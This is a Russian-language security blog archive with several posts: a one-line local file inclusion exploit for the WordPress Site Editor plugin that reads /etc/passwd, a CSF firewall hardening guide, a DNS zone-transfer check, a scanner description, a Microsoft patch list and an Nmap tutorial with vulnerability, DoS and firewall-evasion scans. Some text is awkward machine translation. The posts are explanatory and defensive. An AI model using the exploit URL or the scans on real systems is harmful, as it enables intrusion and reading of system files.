Архив метки: Закрытие уязвимостей

WordPress уязвимость . Site-editor

В плагине WordPress Site Editor наблюдается уязвимость локального включения файлов.

Эксплуатируется примерно так:

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

А вот уязвимый код:

 if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){

require_once $_REQUEST['ajax_path'];

} 

Это в https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5

Уязвимость в версии 1.1.1, но исправлять ее, похоже, никто не собирается.

Источник https://t.me/informhardening



2018-03-20T13:32:07
Закрытие уязвимостей

Ограничение доступа к конкретным портам по странам в CSF

Если у вас есть выделенный сервер или VPS, скорее всего, вы единственный администратор / пользователь root, которому необходимо поддерживать его из SSH или командной строки.

Это означает, что вы также получаете * ответные сообщения электронной почты с вашего сервера о бот-сетях, пытающихся получить доступ к вашему SSH-порту.

Существует много способов управлять этим и защитить ваш сервер.

Наиболее распространенным является изменение портов сервера SSH на что-то необычное.

Второй способ – ограничить доступ SSH по IP или подсети.

У обоих есть свои преимущества.

Третий способ – перейти на проверку подлинности на основе сертификатов.

Но если вы являетесь единственным пользователем SSH / FTP для своего сервера, то ограничение доступа к определенным портам по странам – это еще один вариант, не запомнив порт или несколько подсетей ISP, которые вы используете.

Например, я управляю своими серверами с моего мобильного телефона (так, он использует мой IP-адреса операторов), из дома (домашний интернет-провайдер), с работы (офисная подсеть), из публичной WiFi  сети через VPN и т. д.

В зависимости от того, где я нахожусь и порты открыты в своем брандмауэре, я обнаружил, что могу просто ограничить его кодом страны и использовать проверку подлинности на основе сертификатов.

Это уменьшает ложные срабатывания до нуля.

Я использую ConfigServer Security & Firewall (или более известный как CSF Firewall).

Помимо изменения SSH-портов, перехода на аутентификацию на основе сертификатов, я ограничиваю доступ к конкретным портам по странам в CSF.

Чтобы ограничить возможность подключения по определенному порту или портам посетителям  IP-адресами, происходящими из определенной страны или стран, вы должны:

  • Закройте этот порт в брандмауэре

  • Определить коды стран, разрешенные для подключения к этим заблокированным портам

  • Укажите заблокированные порты, которые будут открыты для указанной страны

Шаг 1 – Закройте порты в брандмауэре

Войдите на свой сервер через SSH и перейдите в папку /etc/csf.

Создайте резервную копию файла csf.conf.

 # cd /etc/csf

# cp csf.conf csf.conf-bkp

# vi csf.conf 

Откройте файл csf.conf и прокрутите страницу вниз до раздела настроек порта IPv4 и удалите нужный номер порта (в данном случае порт 22) из полей TCP_IN и UDP_IN (если есть).

мы удалили порт 48695 из разрешенных входящих портов IPV4, эффективно блокируя внешний доступ к порту:

Шаг 2 – Добавьте код страны

Запишите для CC_ALLOW_PORTS, там есть раздел « Settings » и добавьте код страны в CC_ALLOW_PORTS.

Я разрешаю трафик, исходящий от DE, подключаться к портам, которые в противном случае были закрыты в брандмауэре.

Несколько стран могут быть разделены запятыми без пробелов между ними, и вы можете найти список букв ISO 3166-1 alfa-2 на странице https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2

Найдите в конфиге поля CC_ALLOW_PORTS_TCP и CC_ALLOW_PORTS_UDP.

Добавьте порт 48695, чтобы открыть страну (или страны), указанную в CC_ALLOW_PORTS, здесь, начиная с Шага 2.

После того, как все сделано, сохраните csf.conf.

Шаг 3 – Перезапустите CSF и LFD

Теперь нам нужно перезапустить CSF и LFD.

 # service lfd restart

# csf -r 

Это изменение позволит только пользователям из Германии (DE) получить доступ к моему настраиваемому SSH-порту в настройках порта IPV4 брандмауэра на порту 48695.



2018-03-19T17:05:19
Закрытие уязвимостей

DNSSPY. Сканер безопасности DNS

Забавный сервис по анализу DNS https://dnsspy.io/scan. Бесплатный.

Красиво выводит результаты, дает рекомендации и даже геймофикация немного добавлена.

Оценивает доступность, скорость работы, резервирование и безопасность.

Под безопасностью подразумеваются DNSSEC и возможная компрометация провайдера. Зато отдельно есть сводка по публично доступным адресам в домене, можно посмотреть, нет ли там чего, о чем вы предпочли бы не распространяться.

А что действительно стоит проверить на ваших днс-серверах, так это возможность публичного трансфера зоны:

dig @<NS address> example.com axfr

Удивительно, но даже крупные провайдеры порой его не ограничивают.

Так что в случае чего можно ткнуть провайдера в проблему или подкрутить настройки на собственных серверах, в зависимости от используемой схемы.

dnsspy.io

DNS Spy: Paranoid about your DNS. Monitor & back-up your DNS, get alerts when your DNS chang

Источник – https://t.me/informhardening



2018-03-19T13:41:07
Закрытие уязвимостей

Taipan – сканер безопасности веб-приложений

Описание

Taipan – это автоматизированный сканер веб-приложений, который позволяет автоматически идентифицировать уязвимости в Интернете.

Этот проект является основным двигателем более широкого проекта, который включает в себя другие компоненты, такие как веб-панель мониторинга, где вы можете управлять сканированием или загружать отчет в формате PDF и агент сканера для запуска на конкретном хосте.

Использование

Taipan может работать как на Windows (изначально), так и на Linux (с моно).

Чтобы запустить его в Linux, вам нужно установить mono в версии> = 4.8.0.

Вы можете отслеживать реализацию новых функций в соответствующем борде Kanban.

Профиль сканирования

Taipan позволяет сканировать данный веб-сайт, указывая разные профили.

Каждый профиль включает или отключает определенную функцию сканирования, чтобы показать, что весь доступный профиль запускайте Taipan с опцией –show-profiles.

Сканирование / Стоп / Пауза сканирования

Во время сканирования вы можете взаимодействовать с ним, задав сканирование в режиме «Пауза» или «Остановить», если это необходимо.

Для этого вам нужно нажать:

P: приостановить сканирование

S: остановить сканирование

R: возобновить приостановленное сканирование

Изменение состояния не является немедленным, и вам нужно подождать, пока все потоки не достигнут состояния desider.

Запустить сканирование

Чтобы запустить новое сканирование, вы должны указать URL-адрес и профиль, который необходимо использовать.

Нет необходимости указывать полное имя профиля, достаточно префикса.

Ниже приведен пример выполнения:

https://camo.githubusercontent.com/54beb0b231ce10af0358c47df2bb9b7d6e3eab28/68747470733a2f2f61736369696e656d612e6f72672f612f3136363336322e706e67

Компоненты Taipan

Taipan состоит из четырех основных компонентов:

  • Веб-приложение fingerprinter: он проверяет данное приложение, чтобы определить, является ли оно COTS-приложением. Если это так, он извлекает идентифицированную версию.

  • Обнаружение скрытых ресурсов: этот компонент сканирует приложение, чтобы идентифицировать ресурсы, которые не являются непосредственно доступными или к которым не следует обращаться, например, секретные страницы или тестовые страницы.

  • Crawler: этот компонент перемещает веб-сайт, чтобы предоставить другим компонентам список страниц для анализа. Он позволяет мутировать запрос, чтобы найти не столь распространенные шаблоны.

  • Сканер уязвимостей: этот компонент проверяет веб-приложение и пытается определить возможные уязвимости. Он состоит из различных аддонов, чтобы легко расширить свою базу знаний.

Скачать Taipan

 



2018-03-14T14:59:09
Закрытие уязвимостей

Microsoft выпустила обновления безопасности для системы и более 70 уязвимостей исправлены

Обновления безопасности Microsoft выпущены во время патча во вторник в этом месяце (март) и исправлены более 70 уязвимостей во всех категориях серьезности и с 61 оцененными как важные.

Эти обновления безопасности Microsoft, включая все исправления безопасности для уязвимостей, которые влияют на Windows 10 и Microsoft, выведут автоматическое обновление для всех пользователей Windows 10.

Обновления безопасности для мартовской версии бесостоят из некоторых основных продуктов Microsoft, таких как и все обновления доступны через Microsoft Update Catalog.

  • Internet Explorer
  • Microsoft Edge
  • Microsoft Windows
  • Microsoft Office and Microsoft Office Services and Web Apps
  • Microsoft Exchange Server
  • ASP.NET Core
  • .NET Core
  • PowerShell Core
  • ChakraCore
  • Adobe Flash

Многие из CVE выпущены в категории Critical Vulnerabilities в этих обновлениях безопасности Microsoft, таких как удаленное выполнение кода, обнаружение информации, исправленное в Internet Explorer и в браузере Microsoft Edge.

В этом исправлении безопасности на основе браузера содержится 21 уязвимость, а 14 уязвимостей отмечены как критические и остаются уязвимыми, отмеченными как важные.

Наряду с этими обновлениями безопасности Microsoft Adobe выпустила обновления для системы безопасности для Adobe Flash Player для Windows, Macintosh, Linux и Chrome OS.

Эти обновления касаются критических уязвимостей в Adobe Flash Player 28.0.0.161 и более ранних версиях. все уязвимости. Успешная эксплуатация может привести к произвольному выполнению кода в контексте текущего пользователя

Пропатченные уязвимости Microsoft Security Updates















































































ИдентификаторCVE IDCVE Название
.NET CoreCVE-2018-0875.NET Core Denial of Service Vulnerability
Adobe Flash PlayerADV180006March 2018 Adobe Flash Security Update
ASP .NETCVE-2018-0787ASP.NET Core Elevation of Privilege Vulnerability
ASP.NETCVE-2018-0808ASP.NET Core Denial of Service Vulnerability
Device GuardCVE-2018-0884Windows Security Feature Bypass Vulnerability
Internet ExplorerCVE-2018-0929Internet Explorer Information Disclosure Vulnerability
Internet ExplorerCVE-2018-0942Internet Explorer Elevation of Privilege Vulnerability
Microsoft BrowsersCVE-2018-0932Microsoft Browser Information Disclosure Vulnerability
Microsoft BrowsersCVE-2018-0927Microsoft Browser Information Disclosure Vulnerability
Microsoft EdgeCVE-2018-0879Microsoft Edge Information Disclosure Vulnerability
Microsoft Exchange ServerCVE-2018-0941Microsoft Exchange Information Disclosure Vulnerability
Microsoft Exchange ServerCVE-2018-0940Microsoft Exchange Elevation of Privilege Vulnerability
Microsoft Exchange ServerCVE-2018-0924Microsoft Exchange Information Disclosure Vulnerability
Microsoft Graphics ComponentCVE-2018-0817Windows GDI Elevation of Privilege Vulnerability
Microsoft Graphics ComponentCVE-2018-0815Windows GDI Elevation of Privilege Vulnerability
Microsoft Graphics ComponentCVE-2018-0816Windows GDI Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0903Microsoft Access Remote Code Execution Vulnerability
Microsoft OfficeCVE-2018-0909Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0911Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0907Microsoft Office Excel Security Feature Bypass
Microsoft OfficeCVE-2018-0910Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0947Microsoft Sharepoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0913Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0912Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0919Microsoft Office Information Disclosure Vulnerability
Microsoft OfficeCVE-2018-0921Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0915Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0916Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0917Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0944Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0914Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft OfficeCVE-2018-0922Microsoft Office Memory Corruption Vulnerability
Microsoft OfficeCVE-2018-0923Microsoft SharePoint Elevation of Privilege Vulnerability
Microsoft Scripting EngineCVE-2018-0893Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0874Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0876Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0936Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0873Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0891Scripting Engine Information Disclosure Vulnerability
Microsoft Scripting EngineCVE-2018-0889Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0872Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0925Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0934Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0933Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0931Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0935Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0930Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Scripting EngineCVE-2018-0939Scripting Engine Information Disclosure Vulnerability
Microsoft Scripting EngineCVE-2018-0937Chakra Scripting Engine Memory Corruption Vulnerability
Microsoft Video ControlCVE-2018-0881Microsoft Video Control Elevation of Privilege Vulnerability
Microsoft WindowsCVE-2018-0886CredSSP Remote Code Execution Vulnerability
Microsoft WindowsCVE-2018-0878Windows Remote Assistance Information Disclosure Vulnerability
Microsoft WindowsCVE-2018-0902CNG Security Feature Bypass Vulnerability
Microsoft WindowsCVE-2018-0983Windows Storage Services Elevation of Privilege Vulnerability
Windows Desktop BridgeCVE-2018-0877Windows Desktop Bridge VFS Elevation of Privilege Vulnerability
Windows Desktop BridgeCVE-2018-0882Windows Desktop Bridge Elevation of Privilege Vulnerability
Windows Desktop BridgeCVE-2018-0880Windows Desktop Bridge Elevation of Privilege Vulnerability
Windows Hyper-VCVE-2018-0885Windows Hyper-V Denial of Service Vulnerability
Windows Hyper-VCVE-2018-0888Hyper-V Information Disclosure Vulnerability
Windows InstallerCVE-2018-0868Windows Installer Elevation of Privilege Vulnerability
Windows KernelCVE-2018-0897Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0899Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0898Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0894Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0977Win32k Elevation of Privilege Vulnerability
Windows KernelCVE-2018-0896Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0895Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0900Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0814Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0811Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0904Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0901Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0926Windows Kernel Information Disclosure Vulnerability
Windows KernelCVE-2018-0813Windows Kernel Information Disclosure Vulnerability
Windows ShellCVE-2018-0883Windows Shell Remote Code Execution Vulnerability

 

Пропатченные уязвимости Adobe





Бесплатное использование

Удаленное выполнение кода

критическая

CVE-2018-4919

Тип незаберихм

Удаленное выполнение кода

критическая

CVE-2018-4920

 

Как обновить мое устройство?

Для вашего персонального устройства Windows 10 автоматически проверяет последние обновления.

Чтобы подтвердить, что вы в курсе, перейдите в «Настройки», выберите «Обновить» и «Безопасность», а затем нажмите «Проверить наличие обновлений».

Вы также можете посетить страницу «Безопасность Windows» и выбрать «Проверить обновление», чтобы вручную обновить устройство.

 

 

 

 

 

 

 

 



2018-03-14T11:28:16
Закрытие уязвимостей

Как установить Nmap 7.01 и использовать его в Linux Mint 18.3

Как установить Nmap 7.01 и использовать на Linux Mint 18.3

Nmap (Network Mapper) является программой с открытым исходным кодом и очень универсальным инструментом для системных / сетевых администраторов Linux. Nmap используется для изучения сетей; выполнять проверки безопасности, сетевой аудит и находить открытые порты на удаленной машине.

Он сканирует виртуальные хосты, операционные системы, фильтры пакетов и открытые порты, работающие на удаленных хостах.

Установка Nmap 7.01 настолько проста, что вы сами сейчас в этом убедитесь.

Установка Nmap

Большинство современных дистрибутивов Linux, таких как Red Hat, CentOS, Fedora, Debian и Ubuntu, включили Nmap в свои репозитории управления пакетами по умолчанию, называемые Yum и APT.

Для установки Nmap выполните следующую команду.

 # apt-get install nmap

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following additional packages will be installed:

liblinear3 lua-lpeg

Suggested packages:

liblinear-tools liblinear-dev

Recommended packages:

ndiff

The following NEW packages will be installed:

liblinear3 lua-lpeg nmap

0 upgraded, 3 newly installed, 0 to remove and 174 not upgraded.

.

.

Processing triggers for libc-bin (2.23-0ubuntu9) ...

Processing triggers for man-db (2.7.5-1) ...

Setting up liblinear3:amd64 (2.1.0+dfsg-1) ...

Setting up lua-lpeg:amd64 (0.12.2-1) ...

Setting up nmap (7.01-2ubuntu2) ...

Processing triggers for libc-bin (2.23-0ubuntu9) ... 

Теперь, когда установлен Nmap, мы увидим широкий диапазон его удобства использования.

Проверка на наличие уязвимостей с Nmap

Во-первых, давайте сканируем нашу цель на уязвимости следующим образом:

 # nmap -Pn --script vuln 192.168.7.232

Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:11 IST

Pre-scan script results:

| broadcast-avahi-dos:

| Discovered hosts:

| 192.168.7.134

| 192.168.7.147

| 192.168.7.130

| 192.168.7.144

| 192.168.7.141

| 192.168.7.138

.

.

| After NULL UDP avahi packet DoS (CVE-2011-1002).

|_ Hosts are all up (not vulnerable).

Nmap scan report for 192.168.7.232

Host is up (0.00016s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)



Nmap done: 1 IP address (1 host up) scanned in 38.94 seconds 

После завершения сканирования вы можете просмотреть вывод Nmap, чтобы узнать, какие уязвимости были обнаружены.

Выводы, а также применимые CVE и ссылки на любые эксплойты, которые существуют в базе данных Exploit Insensive Security, перечислены.

Вы также можете использовать команду nmap следующим образом, чтобы проверить, уязвим ли целевой объект на DoS.

 # nmap --script dos -Pn 192.168.7.232



Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:14 IST

Pre-scan script results:

| broadcast-avahi-dos:

| Discovered hosts:

| 192.168.7.142

| 192.168.7.147

| 192.168.7.144

| 192.168.7.121

| 192.168.7.141

.

.

| 192.168.7.134

| 192.168.7.129

| After NULL UDP avahi packet DoS (CVE-2011-1002).

|_ Hosts are all up (not vulnerable).

Nmap scan report for 192.168.7.232

Host is up (0.00018s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)



Nmap done: 1 IP address (1 host up) scanned in 40.17 seconds 

Вы также можете использовать команду nmap для сканирования с использованием IP-адреса:

 # nmap 192.168.7.232

Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:17 IST

Nmap scan report for 192.168.7.232

Host is up (0.00012s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)



Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds 

Кроме того, вы можете сканировать информацию о ОС и Traceroute следующим образом:

 # nmap -A 192.168.7.232



Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:18 IST

Nmap scan report for 192.168.7.232

Host is up (0.00030s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

| ssh-hostkey:

| 2048 63:bf:4e:a0:11:14:59:ff:19:99:74:ae:45:ce:c0:18 (RSA)

|_ 256 19:29:9e:3b:50:57:14:37:d2:3f:7e:49:c1:b4:d4:d9 (ECDSA)

111/tcp open rpcbind 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

|_ 100000 2,3,4 111/udp rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.0

Network Distance: 1 hop



TRACEROUTE

HOP RTT ADDRESS

1 0.29 ms 192.168.7.232



OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds 

Вы также можете включить обнаружение ОС с помощью Nmap, все, что вам нужно сделать, это использовать опцию -O. «-osscan-guess» также помогает обнаружить информацию о ОС.

 # nmap -O 192.168.7.232



Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:20 IST

Nmap scan report for 192.168.7.232

Host is up (0.00024s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.0

Network Distance: 1 hop



OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 3.60 seconds 

Если вы хотите узнать версию Nmap, вы можете запустить следующую команду:

# nmap -V



Nmap version 7.01 ( https://nmap.org )

Platform: x86_64-pc-linux-gnu

Compiled with: liblua-5.2.4 openssl-1.0.2g libpcre-8.38 libpcap-1.7.4 nmap-libdnet-1.12 ipv6

Compiled without:

Available nsock engines: epoll poll select 

Вы также можете распечатать интерфейсы и маршруты ost, используя следующую команду:

 # nmap --iflist



Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:22 IST

************************INTERFACES************************

DEV (SHORT) IP/MASK TYPE UP MTU MAC

ens33 (ens33) 192.168.7.234/24 ethernet up 1500 00:0C:29:F8:F9:81

ens33 (ens33) fe80::19ae:fc6a:5310:718b/64 ethernet up 1500 00:0C:29:F8:F9:81

lo (lo) 127.0.0.1/8 loopback up 65536

lo (lo) ::1/128 loopback up 65536



**************************ROUTES**************************

DST/MASK DEV METRIC GATEWAY

192.168.7.0/24 ens33 100

169.254.0.0/16 ens33 1000

0.0.0.0/0 ens33 100 192.168.7.1

::1/128 lo 0

fe80::19ae:fc6a:5310:718b/128 lo 0

fe80::/64 ens33 256

ff00::/8 ens33 256 

Вы также можете выполнить нулевое сканирование TCP, чтобы обмануть брандмауэр.

 # nmap -sN 192.168.7.232



Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-18 04:23 IST

Nmap scan report for 192.168.7.232

Host is up (0.00032s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open|filtered ssh

111/tcp open|filtered rpcbind

MAC Address: 00:0C:29:7F:EC:FD (VMware)



Nmap done: 1 IP address (1 host up) scanned in 95.17 seconds 

Таким образом, этот учебник по установке и использованию Nmap на Linux Mint подходит к концу.



2018-03-13T10:54:16
Закрытие уязвимостей